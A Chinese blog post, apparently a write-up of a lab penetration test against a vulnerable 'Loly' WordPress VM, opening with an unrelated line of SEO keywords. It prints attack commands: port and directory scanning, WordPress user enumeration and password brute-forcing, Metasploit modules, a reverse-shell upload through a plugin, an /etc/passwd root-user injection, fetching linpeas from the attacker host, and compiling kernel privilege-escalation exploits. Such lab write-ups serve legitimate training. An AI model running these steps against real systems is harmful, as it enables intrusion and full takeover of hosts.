基于PHP网站开发的管理系统设计与开发,四川建设网官方网站,进出口贸易网站制作,如何介绍设计的网站模板下载地址**写在前面#xff1a;**记录博主的一次打靶经历 目录1. 主机发现2. 端口扫描3. 服务枚举4. web服务探查4.1 WordPress探测4.2 使用metasploit4.3 使用wpscan4.4 阶段性回顾5. 提权5.1 弱密码提权5.2 操作系统信息枚举5.3 定时任务枚举5.4 passwd信息枚举5.5 可执行文件枚举5.… **写在前面**记录博主的一次打靶经历 目录1. 主机发现2. 端口扫描3. 服务枚举4. web服务探查4.1 WordPress探测4.2 使用metasploit4.3 使用wpscan4.4 阶段性回顾5. 提权5.1 弱密码提权5.2 操作系统信息枚举5.3 定时任务枚举5.4 passwd信息枚举5.5 可执行文件枚举5.5.1 /bin/ntfs-3g提权5.5.2 /bin/ping提权5.5.3 内核提权5.5.4 linpeas提权5.5.4.1 CVE-2017-169955.5.4.2 CVE-2016-86555.5.4.3 CVE-2016-51955.5.4.4 CVE-2016-51955.5.5 重新编译ntfs-3g的EXP1. 主机发现
目前只知道目标靶机在65.xx网段通过如下的命令看看这个网段上在线的主机。
$ nmap -sP 192.168.65.0/24锁定目标靶机为65.248。
2. 端口扫描
通过下面的命令对目标靶机进行全端口扫描。
$ sudo nmap -p- 192.168.65.248目标靶机只暴露了一个80端口。
3. 服务枚举
通过下面的命令枚举一下80端口上的服务。
$ sudo nmap -p80 -A -sT -sV 192.168.65.248目标靶机的操作系统应该是Ubuntu运行的web应用服务器是nginx的1.10.3版本。
4. web服务探查
先通过浏览器访问一下。 没有太吸引人的内容就是一个简单的不能再简单的nginx欢迎页面通过dirsearch枚举一下目录看看。
$ dirsearch -u http://192.168.65.248嗯是WordPress的服务再用dirb挂上big字典扫描一下。
$ dirb http://192.168.65.248 /usr/share/dirb/wordlists/big.txt没有特别的发现。
4.1 WordPress探测
接下来老老实实探测一下WordPress服务先用浏览器访问一下登录页面看看。 真够简陋的尝试不同的用户名密码登录一下试试看。 貌似没法正常登录直接跳转到一个怪异的http://loly.lc/wordpress/wp-login.php。返回去看看忘记密码页面。 一样会跳转到loly.lc会不会是我设置了burp代理导致的呢去掉试试看。 效果是一样的。返回去老老实实看http://ip/wordpress/目录吧进去都浏览一下。 这确实是一个比较奇葩的WordPress只有一个上图所示的页面随便都会指向不存在的loly.lc的域名导致不可达。
4.2 使用metasploit
无计可施了用metasploit试试看。
$ msfconsole
msf6 use auxiliary/scanner/http/wordpress_scanner
msf6 auxiliary(scanner/http/wordpress_scanner) set RHOSTS 192.168.65.248
msf6 auxiliary(scanner/http/wordpress_scanner) set TARGETURI /wordpress
msf6 auxiliary(scanner/http/wordpress_scanner) run执行结果对我们来说还是有进展的锁定wordpress版本为5.5。
4.3 使用wpscan
$ wpscan --update
$ wpscan --url http://192.168.65.248/wordpress比metadata得到的信息稍微多了一丢丢接下来用Metasploit尝试一下扫出来的几个。
msf6 auxiliary(scanner/http/wordpress_scanner) search xml-rpc先用序号为2的PHP XML-RPC。
msf6 use exploit/unix/webapp/php_xmlrpc_eval
msf6 exploit(unix/webapp/php_xmlrpc_eval) set RHOSTS 192.168.65.248
msf6 exploit(unix/webapp/php_xmlrpc_eval) set PATH /wordpress/xmlrpc.php失败了再试试序号为7的XML-RPC。
msf6 use auxiliary/scanner/http/wordpress_pingback_access仍然失败再分别试试编号为8的。
msf6 use auxiliary/scanner/http/wordpress_xmlrpc_login
msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) set RHOSTS 192.168.65.248
msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) set TARGETURI /wordpress/仍然失败。接下来查查WP-Cron的。 这个是不存在的到这里为止感觉没有可以下手的地方了。
4.4 阶段性回顾
回想前面的探测阶段总觉得不太正常所有的页面连接都会指向loly.lc这个域名但是这个域名我们是无法访问的。有没有可能这个loly.lc就应该是指向wordpress服务器呢有这种可能性我们直接在kali主机上修改hosts文件添加一行192.168.65.248 loly.lc将loly.lc指向我们的目标靶机试试看。 还挺像那么回事的所有的页面显示不再那么low了尤其是像密码找回等也可以正常打开了接下来重新探查一下。重新进行目录枚举。 总体上感觉比之前的扫描内容多了些。接下来用wpscan扫描一下。
$ wpscan --url http://192.168.65.248/wordpress这里跟之前的搜索结果没有太大差异先用admin/admin尝试登录一下试试看。 嗯这至少说明了admin用户是不存在的这为用户枚举提供了可能性。通过wpscan枚举一下试试看。
$ wpscan --url http://192.168.65.248/wordpress --enumerate u嗯找到了一个用户loly我们手工尝试登录一下看看随便输入密码。 跟之前的错误提示不一样了确实这个用户是存在的下面尝试爆破一下loly用户的密码。
$ wpscan --url http://192.168.65.248/wordpress/wp-login.php --usernames loly --passwords /usr/share/wordlists/rockyou.txt分分钟就爆破出来了loly的密码是fernando手工登录一下试试看。 登录后会出现一个管理邮箱确认的页面点击“The email is correct”试试看。 登录成功了看界面和urlwp-admin这应该是管理员账号。先通过Metasploit搜索一下wordpress关键字。
msf6 search wordpress还真是不少差不多100多项从头开始优先找rank为excellentcheck为yes的项。我们先试试序号为20的WordPress Admin Shell Upload。
msf6 use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) set PASSWORD fernando
msf6 exploit(unix/webapp/wp_admin_shell_upload) set USERNAME loly
msf6 exploit(unix/webapp/wp_admin_shell_upload) set RHOSTS 192.168.65.248
msf6 exploit(unix/webapp/wp_admin_shell_upload) set TARGETURI /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) run竟然上传payload失败了网上有人说修改一下HTTP客户端的超时时间。
msf6 exploit(unix/webapp/wp_admin_shell_upload) show advanced options
msf6 exploit(unix/webapp/wp_admin_shell_upload) set HttpClientTimeout 120并没有实际效果这样搞有些太盲目了既然我们已经拥有管理员账号还是先看看wordpress上安装了哪些插件吧不行的话安装一个带漏洞的插件。 总共三个只启用了一个反垃圾邮件的插件。我们从之前的search结果中筛选出所有rank为excellentcheck为yes并且包含plugin关键字的项如下图所示。 从上面筛选的结果中逐个试一下可惜失败了。 loly用户只可以对已有的插件进行Activate或者Deactivate操作不能安装或者卸载看来loly不是一个完整权限的管理员用户。既然这样就好好点击一下各个页面看看有没有别的路子吧。 首先发现在media这里是可以上传文件的还记得我们之前用的以GIF8开头的那个payload吗GIF应该也算是media吧上传试试看。 额失败了有安全限制。继续往下看在“AdRotate/Manage Media”下可以上传文件并且规定了可接受的文件类型、大小等如下图。 貌似可以用于构建反弹shell的格式就是zip了并且上面的图片中也说了上传后会解压并且会把zip文件删除。把我们的payload.php压缩成zip文件。
$ zip -q -o payload.zip payload.php再次上传。 这次提示上传成功了文件在/banners下面在kali上开启监听并尝试访问一下http://loly.lc/wordpress/wp-content/banners/payload.php。 貌似是突破边界了我们进一步试试看。 确实是突破边界成功。
5. 提权
5.1 弱密码提权 终端异常通过下面的命令优化一下终端然后再试试。
$ /usr/bin/python3.5 -c import pty;pty.spawn(/bin/bash)看来没有弱密码。
5.2 操作系统信息枚举 这样就得到了目标靶机的系统信息Ubuntu 16.04.1的64位版本内核版本为4.4.0-31-generic。
5.3 定时任务枚举 定时任务中没有我们可以用于提权的信息。
5.4 passwd信息枚举 竟然有loly用户用前面我们爆出的密码fernando试试看是否可以切换到loly用户。 密码不对接下来尝试往passwd中写入一个用户。
$ echo testusr:$1$tLZbutZB$fTEL0ldFBYz7sTASmpXop.:0:0:root:/root:/bin/bash /etc/passwd也不允许。
5.5 可执行文件枚举
先查看一下具备suid的二进制文件。
$ find / -perm -us -type f 2/dev/null通过上网搜索貌似这里的ntfs-3g和ping都可以提权接下来我们将使用这两种方式提权试试。
5.5.1 /bin/ntfs-3g提权
EXP地址在https://bugs.chromium.org/p/project-zero/issues/attachment?aid265615signed_aidfGO-0n2HCpBXJ42JqT8tlQ 不过我在利用的时候不管是在靶机还是在kali上始终都是编译失败。 只得暂时放弃。
5.5.2 /bin/ping提权
www-dataubuntu:/$ mkdir -p /tmp/test
www-dataubuntu:/$ ln /bin/ping /tmp/test/target好奇怪别人都是执行成功的但是我这里一直失败暂时放一边。
5.5.3 内核提权
先搜索一下对应内核版本的公共EXP看看。 匹配我们目标靶机的项还挺多的下面使用linpeas看看哪个内核漏洞最有可能。
5.5.4 linpeas提权
$ cd /tmp
$ wget http://192.168.65.202/linpeas.sh
$ chmod 775 linpeas.sh
$ sh linpeas.sh通过扫描发现Exposure的状态为highly probable的CVE漏洞还挺多的主要有CVE-2017-16995、CVE-2016-8655、CVE-2016-5195、CVE-2016-5195。 另外就是具备SUID的应用程序ntfs-3g是可利用的ping是不可利用的。 这也验证了之前ping程序exploit不成功的问题接下来老老实实研究上面的4个CVE漏洞吧。
5.5.4.1 CVE-2017-16995
首先在本地Ubuntu我的是16.04.7上编译45101.c的代码。
ubuntuubuntu: ~$ gcc 45010.c -o 45010然后将编译好的可执行文件45010上传到目标靶机我用的python -m http.server 80 和 wget然后直接在靶机上执行。 感觉貌似提权成功了进一步试一下。 提权成功。
5.5.4.2 CVE-2016-8655
首先在本地Ubuntu我的是16.04.7上编译40871.c的代码。
ubuntuubuntu: ~$ gcc 40871.c -o 40871 -lpthread然后将编译好的可执行文件40871上传到目标靶机我用的python -m http.server 80 和 wget然后直接在靶机上执行。 这个应该也是提权成功了接下来验证一下。 提权成功。
5.5.4.3 CVE-2016-5195
首先在本地Ubuntu我的是16.04.7上编译40611.c的代码。
ubuntuubuntu: ~$ gcc -pthread 40611.c -o 40611然后将编译好的可执行文件40611上传到目标靶机我用的python -m http.server 80 和 wget然后直接在靶机上执行。 这个提权失败。
5.5.4.4 CVE-2016-5195
首先在本地Ubuntu我的是16.04.7上编译40839.c的代码。
ubuntuubuntu: ~$ gcc -pthread 40839.c -o 40839 -lcrypt然后将编译好的可执行文件40839上传到目标靶机我用的python -m http.server 80 和 wget然后直接在靶机上执行。 一直卡在这个界面没反应回去查看了一下靶机挂了重启再试还是同样的现象提权失败。
5.5.5 重新编译ntfs-3g的EXP
既然安装了Ubuntu的16.04版本这里把前面的ntfs-3g的EXP重新编译一下试试看。 仍然不成功又在本地的Ubuntu 16.04.7上试了一下也不成功暂时放弃。 针对目标靶机的打靶到此结束。
